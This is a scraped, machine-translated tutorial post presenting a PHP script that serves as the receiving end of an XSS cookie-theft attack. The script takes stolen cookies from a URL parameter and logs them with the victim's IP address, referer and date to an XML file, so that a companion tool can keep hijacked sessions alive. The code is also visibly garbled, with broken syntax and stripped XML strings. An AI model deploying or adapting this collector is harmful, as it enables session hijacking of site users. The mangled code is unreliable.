PHP script with XSS tool SessionIE_PHP tutorial

What I wrote is purely for fun and not interesting. In the final analysis, it is just to operate xml. The origin can still be attributed to the fact that http://www.cncert.net released a new XSS utilization tool on our mailing list a few days ago. It is similar to the foreigner's hamster. It refreshes regularly on the client to keep the session from timing out. After being accessed once by a cross-site person, the attacker can remain logged in. This tool is made using .net. For convenience, the script that collects cookies is required to save cookies as xml files. He provided an asp program. I only had php space, so I wrote a php program for testing.
Code:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
if( ! file_exists( $my_file ) )
{
CreateXmlFile( );
}

AddData( $my_cookie );
}

function CreateXmlFile( )
{
global $my_file;

$fp = fopen( $my_file, "wb" );
if( ! $fp )
{
exit;
}

fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, "" );

fclose( $fp );
}

function AddData( $my_cookie )
{
global $my_file;

$doc = new DOMDocument( );
$doc->load( $my_file );
$doc->formatOutput = true;

$treeroot = $doc->getElementsBytagName( "treeroot" )->item(0); >createElement( "item" );
$treeroot->appendChild( $item );

if( isset( $_SERVER["REMOTE_HOST"] ) )
{
$ remote_host = $_SERVER["REMOTE_HOST"];
}
elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
{
} $remote_host = $_SERVER["REMOTE_ADDR"];
}
else
{
$remote_host = "NotCare";
}
$title = $doc->createElement( "title", $remote_host );
$item ->appendChild( $title );

if( isset( $_SERVER["HTTP_REFERER"] ) )
{
$refer = $_SERVER["HTTP_REFERER"];
}
else
{
$refer = "http://yahoo.cn";
}
$link = $doc->createElement("link", $refer);
$item->appendChild( $link );

$src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
$item-> appendChild( $src_ip );

$src_os = $doc->createElement( "src_os", "NotCare" );
$item->appendChild( $src_os );

$pubDate = $doc->createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate );

$description = $doc-> ;createElement( "description", $my_cookie );
$item->appendChild( $description );

$doc->save( $my_file );
}

?>

http://www.bkjia.com/PHPjc/532402.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/532402.htmlTechArticleWhat I wrote is purely for fun and not interesting. In the final analysis, it is just to operate xml. The origin is still attributed to the fact that http://www.cncert.net posted a new xs on our mailing list a few days ago...